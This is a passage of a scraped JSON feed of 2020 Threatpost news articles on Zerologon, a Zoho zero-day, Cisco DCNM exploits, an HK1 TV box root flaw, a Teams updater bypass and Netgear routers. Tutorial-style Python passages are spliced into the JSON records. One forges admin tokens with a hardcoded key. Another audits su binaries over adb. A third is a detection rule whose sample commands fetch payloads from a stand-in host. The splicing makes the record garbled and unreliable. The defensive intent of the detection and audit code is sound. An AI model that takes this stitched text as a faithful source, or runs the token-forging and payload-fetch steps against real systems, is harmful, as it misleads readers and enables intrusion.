found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. 
The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. 
According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. 
Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. 
Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. 
Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:03", "description": "Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches.\n\nThe three critical vulnerabilities in question (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) impact DCNM, a platform for managing Cisco data centers that run Cisco\u2019s NX-OS \u2014 the network operating system used by Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches.\n\nThe flaws, patched on[ Jan. 
3](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>), could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices.\n\nFast forward to this week, the security researcher who initially discovered the flaws, Steven Seeley, released public PoC exploits for the flaws.\n\n\u201cIn this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root,\u201d he explained in a [blog post](<https://srcincite.io/blog/2020/01/14/busting-ciscos-beans-hardcoding-your-way-to-hell.html>).\n\n\u201cIn the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.\u201d\n\n## The Flaws\n\nTwo of the flaws ([CVE-2019-15975](<https://www.tenable.com/cve/CVE-2019-15975>) and [CVE-2019-15976](<https://www.tenable.com/cve/CVE-2019-15976>)) are authentication bypass vulnerabilities in the REST API and SOAP API endpoints for Cisco DCNM. Representational State Transfer (REST) is an architecture style for designing networked applications, [according to RestFulApi.net;](<https://restfulapi.net/>) while Simple Object Access Protocol (SOAP) is a standard communication protocol system that allows processes using different operating systems (like Linux and Windows) to communicate via HTTP and its XML, according to a [DZone description](<https://dzone.com/articles/difference-between-rest-and-soap-api>). 
Both flaws stem from a static encryption key that is shared between installations, so a key recovered from one copy of DCNM is valid against every other copy.\n\nThe third bug ([CVE-2019-15977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15977>)) is described by Cisco as \u201cdata center network manager authentication bypass vulnerability.\u201d This flaw exists in the web-based management interface of the DCNM, allowing an unauthenticated, remote attacker to bypass authentication on an affected device.\n\n## PoC Exploit\n\nSeeley said he was able to exploit the flaw by targeting two different setups of DCNM \u201cbecause some code paths and exploitation techniques were platform specific.\u201d Those two were the Cisco DCNM installer for Windows and the DCNM ISO Virtual Appliance for VMware servers (both were DCNM version 11.2, released June 18, 2019).\n\n> I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. \n> \n> Busting Cisco's Beans :: Hardcoding Your Way to Hell <https://t.co/EkwwJ2u195>\n> \n> PoC exploit code:<https://t.co/Xsae7j8xkl><https://t.co/5LxxCEtnRE><https://t.co/8i5u1kLcEi>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [January 14, 2020](<https://twitter.com/steventseeley/status/1217113588294410243?ref_src=twsrc%5Etfw>)\n\nSeeley said that he was able to control all the elements to forge his own token and then use a hardcoded key to generate a Single Sign-On Token (ssoToken), which allowed him to bypass authentication.\n\nFrom there, he could \u201csend a SOAP request to the /DbAdminWSService/DbAdminWS endpoint and add a global admin user that will give us access to all interfaces,\u201d he said.\n\nWith the PoC exploit code now available, Cisco is urging customers to update. 
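The reason a hardcoded signing key is fatal here is that every installation shares it: once pulled out of one copy of DCNM, it signs tokens that every other copy accepts, so the attacker never has to touch the target's login at all. The Python below is an added illustration, not Seeley's exploit code and not DCNM's real ssoToken format; the token layout, the `SHIPPED_STATIC_KEY` value and the `Installation` class are invented for the demo. It forges an admin token against a deployment that trusts the build-time key, then shows the same forged token failing against a deployment whose key was generated at install time.

```python
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional, Tuple

# Hypothetical token layout, NOT Cisco DCNM's real ssoToken format: a JSON
# payload and an HMAC-SHA256 tag over it, hex encoded and joined with a dot.
# What matters for this bug class is where the key comes from, not the layout.

# Constructed stand-in for a key compiled into every shipped build. Anyone
# with one copy of the product can pull it out, so treat it as public.
SHIPPED_STATIC_KEY = b"product-build-static-key-2019"


def mint_token(key: bytes, user: str, role: str, ttl: int = 3600) -> str:
    """Issue <payload_hex>.<tag>, with tag = HMAC-SHA256(key, payload)."""
    claims = {"user": user, "role": role, "exp": int(time.time()) + ttl}
    payload = json.dumps(claims, sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.hex() + "." + tag


def verify_token(key: bytes, token: str) -> Optional[dict]:
    """Return the claims if the tag is valid and the token is unexpired, else None."""
    try:
        payload_hex, tag = token.split(".", 1)
        payload = bytes.fromhex(payload_hex)
    except ValueError:
        return None
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    claims = json.loads(payload)
    if claims.get("exp", 0) < time.time():
        return None
    return claims


class Installation:
    """One deployed copy of the product; it trusts any token its key verifies."""

    def __init__(self, signing_key: bytes):
        self.signing_key = signing_key

    def authenticate(self, token: str) -> Optional[str]:
        claims = verify_token(self.signing_key, token)
        return None if claims is None else f"{claims['user']}:{claims['role']}"


def forge_admin_session(target: Installation, key_from_own_copy: bytes) -> Optional[str]:
    """The attacker mints an admin token offline with the key recovered from
    their own copy of the software and simply presents it to the target."""
    forged = mint_token(key_from_own_copy, "attacker", "global-admin")
    return target.authenticate(forged)


def per_install_key() -> bytes:
    """Mitigation: generate the signing key at install or first boot, not at
    build time, so no two deployments share it and the shipped bits reveal nothing."""
    return secrets.token_bytes(32)


def demo() -> Tuple[Optional[str], Optional[str]]:
    vulnerable = Installation(SHIPPED_STATIC_KEY)   # same key as every other shipped copy
    hardened = Installation(per_install_key())      # key unique to this deployment
    return (
        forge_admin_session(vulnerable, SHIPPED_STATIC_KEY),  # "attacker:global-admin"
        forge_admin_session(hardened, SHIPPED_STATIC_KEY),    # None: extracted key is useless here
    )


if __name__ == "__main__":
    print(demo())
```

The check to run against any product you operate is the same one the example encodes: if the key that authenticates sessions can be found in the installer, the firmware image or the container layer, it is not a secret, and rotating it per deployment is the fix, not obfuscating it.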
The networking giant [released software updates](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass>) patching the vulnerabilities earlier this month.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory,\u201d according to Cisco\u2019s advisory, which was updated on Wednesday.\n", "cvss3": {}, "published": "2020-01-16T22:18:51", "type": "threatpost", "title": "Critical Cisco Flaws Now Have PoC Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-01-16T22:18:51", "id": "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "href": "https://threatpost.com/cisco-dcnm-flaw-exploit/151949/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:07:48", "description": "A critical bug in the Hindotech HK1 TV Box would allow root-privilege escalation thanks to improper access control. 
A successful exploit would allow attackers to steal social-networking account tokens, Wi-Fi passwords, cookies, saved passwords, user-location data, message history, emails, contacts and more, researchers said.\n\nThe bug, which is awaiting a CVE assignment, comes in at 9.3 out of 10 on the [CvSS severity scale](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&version=3.1>), according to researchers at Sick.Codes, a security resource for developers.\n\nThe HK1 Box S905X3 TV Box is an Android-based streaming box that plugs into a TV and allows users to access YouTube, Netflix and other streaming content \u201cover-the-top,\u201d i.e., without a cable subscription. Users can also sign into their favorite email, music and social-networking-related apps for a full \u201csmart TV\u201d experience. It retails for under $100.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nThe vulnerability would allow a local, unprivileged user to escalate to root, the Sick.Codes team said [in a posting](<https://sick.codes/sick-2020-004/>) this week. At issue is a lack of authentication when it comes to the debugging functions of the set-top \u2013 specifically, when connected to the device through the serial port (UART), or while using the [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>) (adb), as an unprivileged user.\n\nadb is a versatile command-line tool that lets users communicate with a device. 
It facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that can be used to run a variety of commands on a device.\n\n\u201cA local attacker using adb, or a physical attacker connecting to the device through the UART serial debugging port, is dropped into a shell as the \u2018shell\u2019 user without entering a username or password,\u201d researchers explained. \u201cOnce logged in as the \u2018shell\u2019 user, the attacker can escalate to root using the /sbin/su binary which is group executable (750), or /system/xbin/su which is executable by all users (755).\u201d\n\nOnce endowed with root privileges, the attacker can view any of the information for the apps the user is signed into \u2013 paving the way for stealing access tokens, passwords, contacts and messages and more. Attackers could also use the HK1 Box maliciously to sniff other devices on the same network, usually in a home-networking environment, according to the analysis.\n\n\u201cFor example, once root, the network Wi-Fi password can be read in plain text at /data/misc/wifi/WifiConfigStore.xml,\u201d researchers explained.\n\nThus far, the issue has not been addressed.\n\nThe vendor for the device is the Shenzhen Hindo Technology Co.,Ltd., based just outside of Hong Kong. The researchers were unable to contact the company (and its website, [www.hindotech.com](<http://www.hindotech.com>), was down as of the time of writing). Instead, the researchers submitted a draft advisory to Amlogic, which shares branding with the device in the States \u2013 and received no response.\n\nThreatpost has tried to contact Shenzhen Hindo but has been unsuccessful in reaching the company.\n\nThis is only the latest entertainment-related security bug. Last week, researchers disclosed the [\u2018WarezTheRemote\u2019 attack](<https://threatpost.com/comcast-tv-remote-homes-snooping/159899/>), affecting Comcast\u2019s XR11 voice remote control. 
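Returning to the HK1 Box finding above: the two conditions the Sick.Codes write-up describes, an adb or UART shell that asks for no credentials and a su binary that the unprivileged shell user can execute, can both be checked from a workstation over adb. The script below is an added example, not the researchers' tooling. It parses constructed `ls -l` and `getprop` output (marked as such in the code) rather than anything captured from an HK1 Box; the property names `ro.adb.secure` and `ro.debuggable` are standard Android properties, not HK1-specific ones, and the toybox-style `ls -l` column layout is assumed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample output, NOT captured from an HK1 Box. On a real device you
# would feed in `adb shell ls -l /sbin/su /system/xbin/su ...` and `adb shell getprop`.
SAMPLE_LS = """\
-rwxr-x--- 1 root shell 52424 2019-06-18 10:00 /sbin/su
-rwxr-xr-x 1 root root  52424 2019-06-18 10:00 /system/xbin/su
-rwx------ 1 root root  52424 2019-06-18 10:00 /vendor/bin/su
-rwsr-xr-x 1 root root  18000 2019-06-18 10:00 /system/bin/ping
"""

SAMPLE_GETPROP = """\
[ro.adb.secure]: [0]
[ro.debuggable]: [1]
[ro.build.type]: [userdebug]
[ro.product.model]: [HK1]
"""

# toybox-style `ls -l`: mode, link count, owner, group, size, date, time, path
LS_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+(?P<path>\S+)$"
)
PROP_RE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<value>[^\]]*)\]$")


def parse_ls(text: str) -> List[Dict[str, str]]:
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def parse_getprop(text: str) -> Dict[str, str]:
    props = {}
    for line in text.splitlines():
        m = PROP_RE.match(line.strip())
        if m:
            props[m.group("key")] = m.group("value")
    return props


def su_findings(entries: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Flag su binaries a non-root user could run. In the mode string, index 6
    is the group execute bit and index 9 the world execute bit (750 vs 755)."""
    findings = []
    for e in entries:
        if e["path"].rsplit("/", 1)[-1] != "su":
            continue
        mode = e["mode"]
        if mode[9] in "xt":
            findings.append((e["path"], "world-executable su (any local user can become root)"))
        elif mode[6] in "xs":
            findings.append((e["path"], f"group-executable su (members of '{e['group']}' can become root)"))
    return findings


def adb_findings(props: Dict[str, str]) -> List[str]:
    """ro.adb.secure=1 makes adbd require an authorized host key before granting
    a shell; ro.debuggable=1 marks a debug build on which `adb root` is permitted."""
    findings = []
    if props.get("ro.adb.secure") != "1":
        findings.append("adb does not require host-key authorization (ro.adb.secure != 1)")
    if props.get("ro.debuggable") == "1":
        findings.append("debuggable build (ro.debuggable = 1)")
    return findings


def audit(ls_text: str, getprop_text: str) -> Dict[str, list]:
    return {
        "su": su_findings(parse_ls(ls_text)),
        "adb": adb_findings(parse_getprop(getprop_text)),
    }


if __name__ == "__main__":
    for area, items in audit(SAMPLE_LS, SAMPLE_GETPROP).items():
        for item in items:
            print(area, item)
```

On a production (user) build you would expect `ro.adb.secure` to be `1`, `ro.debuggable` to be `0`, and no su binary at all; any su that is executable by the `shell` user's group or by everyone is the 750/755 condition the researchers describe.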
The WarezTheRemote flaw would allow attackers to remotely snoop in on victims\u2019 private conversations.\n\nThe flaw is in Comcast\u2019s XR11, a popular voice-activated remote control for cable TV, which has more than 18 million units deployed across the U.S. The remote enables users to say the channel or content they want to watch rather than keying in the channel number or typing to search.\n
", "cvss3": {}, "published": "2020-10-13T16:36:15", "type": "threatpost", "title": "Authentication Bug Opens Android Smart-TV Box to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-13T16:36:15", "id": "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "href": "https://threatpost.com/authentication-bug-android-smart-tv-data-theft/160025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:44", "description": "COVID-19 has [spurred the use of videoconferencing](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) for businesses worldwide \u2013 and this expanded threat surface has lured attackers like moths to a flame. Adding insult to injury, researchers have recently discovered a workaround for a previous Microsoft Teams patch that would allow a malicious actor to use the service\u2019s updater function to download any binary or malicious payload.\n\nEssentially, bad actors could hide in Microsoft Teams updater traffic, which has lately been voluminous.\n\n\u201cDue to the noisy nature of the [updater] traffic, there is a possibility that malicious traffic hiding there will evade the analyst\u2019s view or even be added to a list of allowed, and therefore unmonitored, list of applications,\u201d explained Reegun Jayapaul, researcher at Trustwave SpiderLabs, in [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/>) released on Wednesday.\n\nWhile Microsoft tried to cut off this vector as a conduit for remote code execution by restricting the ability to update Teams via a URL, it was not a complete fix, the researcher 
explained.\n\n\u201cThe updater allows local connections via a share or local folder for product updates,\u201d Jayapaul said. \u201cInitially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to an\u2026SMB share.\u201d\n\nServer Message Block (SMB) protocol is a network file sharing protocol. To exploit this, an attacker would need to drop a malicious file into an open shared folder \u2013 something that typically involves already having network access. However, to reduce this gating factor, an attacker can create a remote rather than local share.\n\n\u201cThis would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step,\u201d Jayapaul said.\n\nTrustwave has published a proof-of-concept attack that uses Microsoft Teams Updater to download a payload \u2013 using known, common software [called Samba](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>) to carry out remote downloading.\n\nFirst, the researcher configured a Samba server for remote, public access. Then, a payload that supports the updater framework must be crafted and uploaded to a remote Samba server that has been authenticated from the Windows \u201cRun\u201d function.\n\n\u201cAfter a successful setup, I initiated the command execution, downloaded remote payload and executed directly from Microsoft Teams Updater, \u2018Update.exe,'\u201d the researcher explained.\n\n\u201cSince the installation is in the local user Appdata folder, no privileged access is needed,\u201d he added. 
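The mitigation the researcher suggests, looking for suspicious connections, is straightforward to express as a process-creation rule: Teams' `Update.exe` launched with an `--update` source that is an SMB share, a local folder, plaintext HTTP, or a host other than the vendor's update service. The Python below is an added example, not Trustwave's proof of concept and not any Microsoft detection. The sample events are constructed in the shape of Sysmon Event ID 1 records, the `--update=<source>` spelling is assumed from the article's mention of the `--update` option, and the allowlisted host `updates.example-vendor.invalid` is a placeholder the defender would replace with the real update CDN.

```python
import re
from typing import Dict, List, Optional, Set
from urllib.parse import urlsplit

# Constructed process-creation events (Sysmon Event ID 1 shape, only the fields
# used here). They are NOT telemetry from the Trustwave research. The exact
# `--update=<source>` syntax is an assumption.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r"Update.exe --update=\\203.0.113.10\public\teams",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r"Update.exe --update=https://updates.example-vendor.invalid/RELEASES",
     "ParentImage": r"C:\Users\bob\AppData\Local\Microsoft\Teams\current\Teams.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r"Update.exe --update=http://203.0.113.10/stage",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'Update.exe --update="C:\Users\Public\drop"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

UPDATE_SRC = re.compile(r'--update[=\s]+"?(?P<src>[^\s"]+)', re.IGNORECASE)
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")   # \\host\share...


def update_source(cmdline: str) -> Optional[str]:
    """Pull the --update argument out of a command line, or None if absent."""
    m = UPDATE_SRC.search(cmdline)
    return m.group("src") if m else None


def classify_source(src: str, allowed_hosts: Set[str]) -> Optional[str]:
    """Return a reason string unless the source is an allowlisted HTTPS host."""
    if UNC_PATH.match(src):
        return "update source is an SMB share"
    parts = urlsplit(src)
    if parts.scheme in ("http", "https"):
        if parts.scheme != "https":
            return "update source is plaintext HTTP"
        if (parts.hostname or "").lower() not in allowed_hosts:
            return f"update host {parts.hostname!r} is not allowlisted"
        return None
    return "update source is a local path"


def scan(events: List[Dict[str, str]], allowed_hosts: Set[str]) -> List[Dict[str, str]]:
    """Run the rule over process-creation events and return one alert per hit."""
    alerts = []
    for ev in events:
        if not ev["Image"].lower().endswith(r"\teams\update.exe"):
            continue
        src = update_source(ev["CommandLine"])
        if src is None:          # e.g. --processStart on a normal launch
            continue
        reason = classify_source(src, allowed_hosts)
        if reason is None:
            continue
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        if parent != "teams.exe":
            reason += f"; launched by {parent}, not Teams.exe"
        alerts.append({"Image": ev["Image"], "source": src, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS, {"updates.example-vendor.invalid"}):
        print(a["reason"], "->", a["source"])
```

The parent-process check is worth keeping even though it is not by itself a verdict: a legitimate update is spawned by Teams, whereas the living-off-the-land use described here is launched from a shell the attacker already controls.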
\u201cAttackers can use this to masquerade the traffic (especially for lateral movement).\u201d\n\nMicrosoft won\u2019t be fixing the problem because \u201cwe determined that this behavior is considered to be by design as we cannot restrict SMB source for \u2013update because we have customers that apparently rely on this (e.g. folder redirection),\u201d the company told Trustwave.\n\nTo avoid or mitigate an attack, users can implement solutions that look for suspicious connections both inbound and outbound; and IT can install Microsoft Teams under the \u201cProgram Files\u201d folder, so an attacker cannot drop and execute the remote payload, according to the researcher. \u201cThis can be carried out by Group policy,\u201d Jayapaul said.\n\nCompanies can also disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team, he added.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. 
**[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-05T15:47:04", "type": "threatpost", "title": "Microsoft Teams Patch Bypass Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-05T15:47:04", "id": "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "href": "https://threatpost.com/microsoft-teams-patch-bypass-rce/158043/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:48", "description": "UPDATE\n\nNetgear will not patch 45 router models that are vulnerable to a high-severity remote code execution flaw, the router company revealed last week. However, the company says that routers that won\u2019t receive updates are outdated or have reached EOL (End of Life).\n\nThe [remote code execution vulnerability](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) in question, [which was disclosed June 15](<https://threatpost.com/netgear-zero-day-takeover-routers/156744/>), allows a network-adjacent attacker to bypass authentication on vulnerable Netgear routers and, per ZDI, execute code as root. The high-severity flaw affects 79 Netgear Wi-Fi routers and home gateway models \u2013 but Netgear says that 45 of those router models are outside of its \u201csecurity support period.\u201d\n\n\u201cNetgear has provided firmware updates with fixes for all supported products previously disclosed by ZDI and Grimm,\u201d Netgear said in a [press statement](<https://www.tomsguide.com/news/netgear-routers-no-fixes>). \u201cThe remaining products included in the published list are outside of our support window. 
In this specific instance, the parameters were based on the last sale date of the product into the channel, which was set at three years or longer.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA full list of the router models that won\u2019t be patched \u2013 as well as those that have fixes being rolled out \u2013 [is available on Netgear\u2019s website](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\n\u201cWhen we look at support windows, some of our products last five or six years, while others last only a few years,\u201d David Henry, senior vice president of Connected Home products at Netgear, told Threatpost. \u201cWhen we launch a product, as it gets old it goes into End of Life (EOL) and we stop building it and wind down [sales into the channel].\u201d\n\nFor instance, one such Modem Router that won\u2019t receive an update, the AC1450 series, is as old as 2009. Other router models, while newer, have reached EOL: The [R6200 and R6200v2](<https://kb.netgear.com/23748/R6200v2-FAQs>) wireless routers reached EOL in 2013 and 2016, respectively; while the Nighthawk [R7300DST](<https://www.amazon.com/NETGEAR-Nighthawk-Wireless-AC-Gigabit-Adapter/dp/B01HB56E5G>) wireless router reached EOL in the first half of 2017, said Henry.\n\nRegardless, Henry stressed that customers using both newer and older router models stay updated on security updates, as well as adopting best security practices, including turning off features like remote access or changing admin passwords (which he said is enforced by Netgear).\n\n\u201cI think it is really important that customers are paying attention to the updates we send out quarterly on our products,\u201d said Henry.\n\n## **The Flaw **\n\nAccording to the [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI), which first disclosed the issue, the flaw exists within the httpd service, 
